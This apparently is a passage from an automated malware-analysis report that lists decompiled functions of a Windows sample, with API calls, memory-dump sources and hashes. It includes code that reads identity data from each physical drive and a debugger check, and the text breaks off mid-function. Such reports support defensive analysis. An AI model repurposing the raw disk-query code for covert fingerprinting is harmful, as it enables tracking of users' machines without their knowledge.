                                                                                                                                                      0x00409804
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004097cd
                                                                                                                                                      0x004097cd
                                                                                                                                                      0x004097d4
                                                                                                                                                      0x004097d4
                                                                                                                                                      0x004097d7
                                                                                                                                                      0x004097da
                                                                                                                                                      0x004097dd
                                                                                                                                                      0x004097e0
                                                                                                                                                      0x004097e0
                                                                                                                                                      0x004097e4
                                                                                                                                                      0x00409846
                                                                                                                                                      0x0040984a
                                                                                                                                                      0x0040984c
                                                                                                                                                      0x0040984e
                                                                                                                                                      0x00409850
                                                                                                                                                      0x00409852
                                                                                                                                                      0x00409852
                                                                                                                                                      0x00409854
                                                                                                                                                      0x00409854
                                                                                                                                                      0x004097e6
                                                                                                                                                      0x004097e6
                                                                                                                                                      0x004097e8
                                                                                                                                                      0x004097ed
                                                                                                                                                      0x004097f2
                                                                                                                                                      0x004097f4
                                                                                                                                                      0x004097f4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004097e4
                                                                                                                                                      0x004097cb
                                                                                                                                                      0x00409780
                                                                                                                                                      0x00409697
                                                                                                                                                      0x00409697
                                                                                                                                                      0x0040969b
                                                                                                                                                      0x0040969d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409438
                                                                                                                                                      0x004096af
                                                                                                                                                      0x004096b2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$c$e
                                                                                                                                                      • API String ID: 0-1157002505
                                                                                                                                                      • Opcode ID: b8cf473db7cb9297b07d1d54a8ff804f5d83ba8f2f9f50276f654a47c6e1c30e
                                                                                                                                                      • Instruction ID: d9c4bdcfbf6ac4d29bf3bf58d3038f237c571d90b969de57a998632f55ae988e
                                                                                                                                                      • Opcode Fuzzy Hash: b8cf473db7cb9297b07d1d54a8ff804f5d83ba8f2f9f50276f654a47c6e1c30e
                                                                                                                                                      • Instruction Fuzzy Hash: C7E1CD32D69209DEEB258E65C9457EE7BB1AB44304F28443BD401B62C3D77D8D82CB1A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00408D68, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 46%
                                                                                                                                                      			E00408D68(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x4109f8 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x4109fc; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x410a00; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x4109f8(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x4109f8 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x4109fc = GetProcAddress(_t15, "GetActiveWindow");
					 *0x410a00 = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}









                                                                                                                                                      0x00408d69
                                                                                                                                                      0x00408d6b
                                                                                                                                                      0x00408d73
                                                                                                                                                      0x00408db7
                                                                                                                                                      0x00408db7
                                                                                                                                                      0x00408dbe
                                                                                                                                                      0x00408dc2
                                                                                                                                                      0x00408dc6
                                                                                                                                                      0x00408dc8
                                                                                                                                                      0x00408dcf
                                                                                                                                                      0x00408dd4
                                                                                                                                                      0x00408dd4
                                                                                                                                                      0x00408dcf
                                                                                                                                                      0x00408dc6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00408de3
                                                                                                                                                      0x00408d80
                                                                                                                                                      0x00408d84
                                                                                                                                                      0x00408ded
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00408ded
                                                                                                                                                      0x00408d92
                                                                                                                                                      0x00408d96
                                                                                                                                                      0x00408d9b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00408d9d
                                                                                                                                                      0x00408dab
                                                                                                                                                      0x00408db2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00408db2

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00406D84,?,Microsoft Visual C++ Runtime Library,00012010,?,0040B658,?,0040B6A8,?,?,?,Runtime Error!Program: ), ref: 00408D7A
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00408D92
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00408DA3
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00408DB0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                      • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                                                                      • API String ID: 2238633743-4044615076
                                                                                                                                                      • Opcode ID: f7850f07079205152cae9b16221561117037284cbd462a1dac085e368bad08e9
                                                                                                                                                      • Instruction ID: 95536b36c0a73afdfafba42784b12344ea0077410b62820a9f877c3a80c8d56d
                                                                                                                                                      • Opcode Fuzzy Hash: f7850f07079205152cae9b16221561117037284cbd462a1dac085e368bad08e9
                                                                                                                                                      • Instruction Fuzzy Hash: 770175B1641316ABD7509FB55D80E973ED8EEA4790710453EF151F22E1DFB8C8409BAC
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001D370, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                                      			E1001D370(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _v8;
				struct _OVERLAPPED* _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _v24;
				short _v540;
				char _v1564;
				long _v1568;
				long _v1572;
				intOrPtr _v1576;
				struct _OVERLAPPED* _v1580;
				struct _OVERLAPPED* _v1584;
				struct _OVERLAPPED* _v1588;
				struct _OVERLAPPED* _v1592;
				struct _OVERLAPPED* _v1596;
				struct _OVERLAPPED* _v1600;
				struct _OVERLAPPED* _v1604;
				void _v1608;
				void* __ebp;
				int _t63;
				void* _t64;
				int _t76;
				void* _t77;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;

				_t97 = __esi;
				_t96 = __edi;
				_t77 = __ebx;
				_v12 = 0;
				_v16 = _a4;
				_v1584 = 0;
				_v1580 = 0;
				do {
					wsprintfW( &_v540, L"\\\\.\\PhysicalDrive%d", _v12);
					_t99 = _t99 + 0xc;
					_v24 = CreateFileW( &_v540, 0xc0000000, 7, 0, 3, 0, 0);
					if(_v24 != 0xffffffff) {
						_v1572 = 0;
						_v1608 = 0;
						_v1604 = 0;
						_v1600 = 0;
						_v1596 = 0;
						_v1592 = 0;
						_v1588 = 0;
						_t63 = DeviceIoControl(_v24, 0x74080, 0, 0,  &_v1608, 0x18,  &_v1572, 0);
						__eflags = _t63;
						if(_t63 != 0) {
							_t64 = L1000CE56(_t77,  &_v1608, _t96, _t97, 0x221);
							_t100 = _t99 + 4;
							_v8 = _t64;
							 *((char*)(_v8 + 0xa)) = 0xec;
							_v1568 = 0;
							__eflags = DeviceIoControl(_v24, 0x7c088, _v8, 0x21, _v8, 0x221,  &_v1568, 0);
							if(__eflags == 0) {
								L10:
								CloseHandle(_v24);
								_push(_v8);
								E1000CA30(_t77, _t96, _t97, __eflags);
								_t99 = _t100 + 4;
								__eflags = _v1584;
								if(_v1584 == 0) {
									_v12 = _v1580;
									goto L13;
								}
								break;
							}
							_v20 = 0;
							do {
								 *(_t98 + _v20 * 4 - 0x618) =  *(_v8 + 0x10 + _v20 * 2) & 0x0000ffff;
								_v20 = _v20 + 1;
								__eflags = _v20 - 0x100;
							} while (_v20 < 0x100);
							_v1576 = E1001CD70( &_v1564);
							_t76 = E1001CFA0(_v1576, 0x104, _v16);
							_t100 = _t100 + 0x10;
							__eflags = _t76;
							if(__eflags == 0) {
								_v1584 = 1;
							}
							goto L10;
						}
						goto L13;
					}
					L13:
					_v12 =  &(_v12->Internal);
					_v1580 = _v12;
				} while (_v12 < 4);
				return _v1584;
			}































                                                                                                                                                      0x1001d370
                                                                                                                                                      0x1001d370
                                                                                                                                                      0x1001d370
                                                                                                                                                      0x1001d379
                                                                                                                                                      0x1001d383
                                                                                                                                                      0x1001d386
                                                                                                                                                      0x1001d390
                                                                                                                                                      0x1001d39a
                                                                                                                                                      0x1001d3aa
                                                                                                                                                      0x1001d3b0
                                                                                                                                                      0x1001d3cf
                                                                                                                                                      0x1001d3d6
                                                                                                                                                      0x1001d3dd
                                                                                                                                                      0x1001d3e7
                                                                                                                                                      0x1001d3f1
                                                                                                                                                      0x1001d3fb
                                                                                                                                                      0x1001d405
                                                                                                                                                      0x1001d40f
                                                                                                                                                      0x1001d419
                                                                                                                                                      0x1001d442
                                                                                                                                                      0x1001d448
                                                                                                                                                      0x1001d44a
                                                                                                                                                      0x1001d456
                                                                                                                                                      0x1001d45b
                                                                                                                                                      0x1001d45e
                                                                                                                                                      0x1001d464
                                                                                                                                                      0x1001d468
                                                                                                                                                      0x1001d499
                                                                                                                                                      0x1001d49b
                                                                                                                                                      0x1001d506
                                                                                                                                                      0x1001d50a
                                                                                                                                                      0x1001d513
                                                                                                                                                      0x1001d514
                                                                                                                                                      0x1001d519
                                                                                                                                                      0x1001d51c
                                                                                                                                                      0x1001d523
                                                                                                                                                      0x1001d52d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d52d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d525
                                                                                                                                                      0x1001d49d
                                                                                                                                                      0x1001d4a4
                                                                                                                                                      0x1001d4b2
                                                                                                                                                      0x1001d4bf
                                                                                                                                                      0x1001d4c2
                                                                                                                                                      0x1001d4c2
                                                                                                                                                      0x1001d4da
                                                                                                                                                      0x1001d4f0
                                                                                                                                                      0x1001d4f5
                                                                                                                                                      0x1001d4f8
                                                                                                                                                      0x1001d4fa
                                                                                                                                                      0x1001d4fc
                                                                                                                                                      0x1001d4fc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d4fa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001d44c
                                                                                                                                                      0x1001d530
                                                                                                                                                      0x1001d536
                                                                                                                                                      0x1001d53c
                                                                                                                                                      0x1001d542
                                                                                                                                                      0x1001d555

                                                                                                                                                      APIs
                                                                                                                                                      • wsprintfW.USER32 ref: 1001D3AA
                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000), ref: 1001D3C9
                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 1001D442
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ControlCreateDeviceFilewsprintf
                                                                                                                                                      • String ID: \\.\PhysicalDrive%d
                                                                                                                                                      • API String ID: 3081802084-2935326385
                                                                                                                                                      • Opcode ID: 695705573c505d6c2190f79248c31773e2dce04a2ed8c2d9fcfd35b4e1f44f30
                                                                                                                                                      • Instruction ID: c19dd4f4148ea860b5569224362e113c716c363f4a93641ea984967bd2cc70da
                                                                                                                                                      • Opcode Fuzzy Hash: 695705573c505d6c2190f79248c31773e2dce04a2ed8c2d9fcfd35b4e1f44f30
                                                                                                                                                      • Instruction Fuzzy Hash: E9513EB4D00318ABEB10DF94DC95BDEB7B5EB84304F108198E509AB280D7B6AA94CF95
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000EFFC, Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E1000EFFC(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x103322d8; // 0x4c242c18
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x10333a58 = _t6;
				 *0x10333a54 = _t22;
				 *0x10333a50 = _t25;
				 *0x10333a4c = _t21;
				 *0x10333a48 = _t27;
				 *0x10333a44 = _t26;
				 *0x10333a70 = ss;
				 *0x10333a64 = cs;
				 *0x10333a40 = ds;
				 *0x10333a3c = es;
				 *0x10333a38 = fs;
				 *0x10333a34 = gs;
				asm("pushfd");
				_pop( *0x10333a68);
				 *0x10333a5c =  *_t31;
				 *0x10333a60 = _v0;
				 *0x10333a6c =  &_a4;
				 *0x103339a8 = 0x10001;
				_t11 =  *0x10333a60; // 0x0
				 *0x1033395c = _t11;
				 *0x10333950 = 0xc0000409;
				 *0x10333954 = 1;
				_t12 =  *0x103322d8; // 0x4c242c18
				_v812 = _t12;
				_t13 =  *0x103322dc; // 0xb3dbd3e7
				_v808 = _t13;
				 *0x103339a0 = IsDebuggerPresent();
				_push(1);
				E10013A5E(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x10023b34);
				if( *0x103339a0 == 0) {
					_push(1);
					E10013A5E(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                                      0x1000effc
                                                                                                                                                      0x1000effc
                                                                                                                                                      0x1000effc
                                                                                                                                                      0x1000effc
                                                                                                                                                      0x1000effc
                                                                                                                                                      0x1000effc
                                                                                                                                                      0x1000effc
                                                                                                                                                      0x1000f002
                                                                                                                                                      0x1000f004
                                                                                                                                                      0x1000f004
                                                                                                                                                      0x10016115
                                                                                                                                                      0x1001611a
                                                                                                                                                      0x10016120
                                                                                                                                                      0x10016126
                                                                                                                                                      0x1001612c
                                                                                                                                                      0x10016132
                                                                                                                                                      0x10016138
                                                                                                                                                      0x1001613f
                                                                                                                                                      0x10016146
                                                                                                                                                      0x1001614d
                                                                                                                                                      0x10016154
                                                                                                                                                      0x1001615b
                                                                                                                                                      0x10016162
                                                                                                                                                      0x10016163
                                                                                                                                                      0x1001616c
                                                                                                                                                      0x10016174
                                                                                                                                                      0x1001617c
                                                                                                                                                      0x10016187
                                                                                                                                                      0x10016191
                                                                                                                                                      0x10016196
                                                                                                                                                      0x1001619b
                                                                                                                                                      0x100161a5
                                                                                                                                                      0x100161af
                                                                                                                                                      0x100161b4
                                                                                                                                                      0x100161ba
                                                                                                                                                      0x100161bf
                                                                                                                                                      0x100161cb
                                                                                                                                                      0x100161d0
                                                                                                                                                      0x100161d2
                                                                                                                                                      0x100161da
                                                                                                                                                      0x100161e5
                                                                                                                                                      0x100161f2
                                                                                                                                                      0x100161f4
                                                                                                                                                      0x100161f6
                                                                                                                                                      0x100161fb
                                                                                                                                                      0x1001620f

                                                                                                                                                      APIs
                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 100161C5
                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100161DA
                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(10023B34), ref: 100161E5
                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 10016201
                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 10016208
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                      • Opcode ID: 469b891285ebbef8cb1b1fd3885dfcaa8d07e7beac247f7a81ea467a82630b0a
                                                                                                                                                      • Instruction ID: 7a4982afc0af0121ee83e1bbc930dedb521e4c826244c77e9c1cc9287b5788a2
                                                                                                                                                      • Opcode Fuzzy Hash: 469b891285ebbef8cb1b1fd3885dfcaa8d07e7beac247f7a81ea467a82630b0a
                                                                                                                                                      • Instruction Fuzzy Hash: 0A21CCB4901264EFE700DF29DCC86447BA8FB88311F50D11AE98D8AB62E7B499C5CF02
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10019780, Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                      			E10019780(void* __ebx, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a36, intOrPtr* _a40, intOrPtr* _a44) {
				char _v8;
				char _v12;
				void* _t45;

				_v8 = 0;
				_v12 = 0;
				__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12, 0, 0, _a44);
				if(GetLastError() == 0x7a) {
					 *_a40 = L1000CE56(__ebx, _a44, _t45, __esi,  *_a44);
					E1000CF20(_t45,  *_a40, 0,  *_a44);
					__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12,  *_a40,  *_a44, 0);
					_v8 = 1;
				}
				return _v8;
			}






                                                                                                                                                      0x10019786
                                                                                                                                                      0x1001978d
                                                                                                                                                      0x100197ac
                                                                                                                                                      0x100197bb
                                                                                                                                                      0x100197ce
                                                                                                                                                      0x100197de
                                                                                                                                                      0x10019804
                                                                                                                                                      0x1001980a
                                                                                                                                                      0x1001980a
                                                                                                                                                      0x10019817

                                                                                                                                                      APIs
                                                                                                                                                      • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 100197AC
                                                                                                                                                      • GetLastError.KERNEL32 ref: 100197B2
                                                                                                                                                      • _memset.LIBCMT ref: 100197DE
                                                                                                                                                      • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019804
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DevicePropertyRegistrySetup$ErrorLast_memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 895502402-0
                                                                                                                                                      • Opcode ID: 6adbbad0e525441aa34f394d1e709c810f69e4a50dd3602c5c2cb0cc2a6a471c
                                                                                                                                                      • Instruction ID: f8922b701b9361cc18bff0ab125b4374f9cfd65e033693ba824ef8b8be46b605
                                                                                                                                                      • Opcode Fuzzy Hash: 6adbbad0e525441aa34f394d1e709c810f69e4a50dd3602c5c2cb0cc2a6a471c
                                                                                                                                                      • Instruction Fuzzy Hash: 8C1193B9610208BBDB04DF98D895FDA77B9AB49304F108259F9099B284D631EA85CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00401000, Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E00401000() {
				void* _v152;
				struct _OSVERSIONINFOA _v156;
				int _t13;

				memset( &_v156, 0, 0x27 << 2);
				_v156.dwOSVersionInfoSize = 0x9c;
				_t13 = GetVersionExA( &_v156);
				if(_t13 != 0) {
					L4:
					asm("sbb eax, eax");
					return _t13 + 1;
				} else {
					_v156.dwOSVersionInfoSize = 0x9c;
					_t13 = GetVersionExA( &_v156);
					if(_t13 != 0) {
						goto L4;
					} else {
						_v156.dwOSVersionInfoSize = 0x94;
						_t13 = GetVersionExA( &_v156);
						if(_t13 != 0) {
							goto L4;
						} else {
							return _t13;
						}
					}
				}
			}






                                                                                                                                                      0x00401019
                                                                                                                                                      0x00401025
                                                                                                                                                      0x00401029
                                                                                                                                                      0x0040102d
                                                                                                                                                      0x0040105a
                                                                                                                                                      0x00401063
                                                                                                                                                      0x0040106c
                                                                                                                                                      0x0040102f
                                                                                                                                                      0x00401033
                                                                                                                                                      0x00401038
                                                                                                                                                      0x0040103c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040103e
                                                                                                                                                      0x00401042
                                                                                                                                                      0x0040104b
                                                                                                                                                      0x0040104f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401059
                                                                                                                                                      0x00401059
                                                                                                                                                      0x00401059
                                                                                                                                                      0x0040104f
                                                                                                                                                      0x0040103c

                                                                                                                                                      APIs
                                                                                                                                                      • GetVersionExA.KERNEL32(?), ref: 00401029
                                                                                                                                                      • GetVersionExA.KERNEL32(?), ref: 00401038
                                                                                                                                                      • GetVersionExA.KERNEL32(?), ref: 0040104B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Version
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1889659487-0
                                                                                                                                                      • Opcode ID: 710451c45f8dfd25da9ecc52a2db16fffe487da5b37058df93ff72893883cd8c
                                                                                                                                                      • Instruction ID: 643cff9135a756f24650b46ce0448332fbe4b8e7e2291f0d1fd909cc2a13ae58
                                                                                                                                                      • Opcode Fuzzy Hash: 710451c45f8dfd25da9ecc52a2db16fffe487da5b37058df93ff72893883cd8c
                                                                                                                                                      • Instruction Fuzzy Hash: B3F06835A04301E6E710DB24DC40FAB7FE9ABC4350F40C93AE88D93261E37CD4854A92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10015376, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 37%
                                                                                                                                                      			E10015376(void* __eax, void* __ebx, void* __edx) {
				_Unknown_base(*)()* _t8;

				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
				_t8 = SetUnhandledExceptionFilter(E10013034());
				 *0x10333948 = 0;
				return _t8;
			}




                                                                                                                                                      0x1001537b
                                                                                                                                                      0x1001538b
                                                                                                                                                      0x10015391
                                                                                                                                                      0x10015398

                                                                                                                                                      APIs
                                                                                                                                                      • __decode_pointer.LIBCMT ref: 10015384
                                                                                                                                                        • Part of subcall function 10013034: TlsGetValue.KERNEL32(?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001,?,?,10330240), ref: 10013041
                                                                                                                                                        • Part of subcall function 10013034: TlsGetValue.KERNEL32(00000005,?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001), ref: 10013058
                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001538B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1958600898-0
                                                                                                                                                      • Opcode ID: 026a2832a62c4de7d18cd6651ba4de6fd2eed84fc9b044cf4274b323323370fa
                                                                                                                                                      • Instruction ID: 3b6d90ad01df6bd045dcc3eba6c64e606fc46edd6eab32e77edfd426c87a7152
                                                                                                                                                      • Opcode Fuzzy Hash: 026a2832a62c4de7d18cd6651ba4de6fd2eed84fc9b044cf4274b323323370fa
                                                                                                                                                      • Instruction Fuzzy Hash: 44C08C5C40C3C0DED711C37888CE30DBB08A702822FA4C4C8D0808C243CAE580C08121
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10019E10, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E10019E10() {
				long _v8;
				signed int _v12;
				intOrPtr _v16;

				_v16 = 0;
				_v8 = GetVersion();
				_v12 = _v8 & 0xff;
				if(_v12 != 5) {
